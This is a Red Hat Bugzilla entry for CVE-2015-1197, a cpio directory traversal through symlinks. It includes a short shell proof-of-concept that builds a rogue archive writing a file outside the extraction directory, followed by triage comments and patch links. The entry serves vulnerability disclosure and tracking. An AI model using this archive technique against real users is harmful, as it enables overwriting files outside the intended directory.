Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.
First Last Prev Next    This bug is not in your last search results.
Bug 1179773 - (CVE-2015-1197) CVE-2015-1197 cpio: directory traversal through symlinks
CVE-2015-1197 cpio: directory traversal through symlinks
Status: CLOSED WONTFIX
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
impact=low,public=20150105,reported=2...
: Security
: CVE-2017-7516 (view as bug list)
Depends On: 1188590
Blocks: 1179777 1458829
  Show dependency treegraph
 
Reported: 2015-01-07 09:38 EST by Vasyl Kaigorodov
Modified: 2018-09-06 01:14 EDT (History)
8 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-01-22 00:57:08 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)
Add an attachment (proposed patch, testcase, etc.)

  None (edit)
Description Vasyl Kaigorodov 2015-01-07 09:38:42 EST 
It was reported [1] that cpio is susceptible to a directory traversal vulnerability.

Original report follows:
...
While extracting an archive, it will extract symlinks and then follow them if 
they are referenced in further entries. This can be exploited by a rogue 
archive to write files outside the current directory.

Example:

1) create a sample archive:

ln -s /tmp dir
echo dir | cpio -oF test.cpio
rm dir
mkdir dir
echo hello > dir/file
echo dir/file | cpio -oAF test.cpio
rm -r dir

2) test it:

cpio --no-absolute-filenames -ivF test.cpio

This will create a symlink "dir" in the current directory and a file 
"/tmp/file".
...

No patches are available at this time.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669
Comment 1 Siddharth Sharma 2015-01-22 00:55:18 EST 
Analysis
========

This attack requires to social engineer the user to open the cpio archive, impact of this is low.
Comment 3 Martin Prpič 2015-02-03 05:32:05 EST 
Suse created a patch for this, attached at:

https://bugzilla.suse.com/show_bug.cgi?id=658010
Comment 4 Martin Prpič 2015-02-03 05:35:15 EST 
Created cpio tracking bugs for this issue:

Affects: fedora-all [bug 1188590]
Comment 6 Cedric Buissart 2018-03-13 07:43:09 EDT 
*** Bug 1539685 has been marked as a duplicate of this bug. ***
Note You need to log in before you can comment on or make changes to this bug.
First Last Prev Next    This bug is not in your last search results.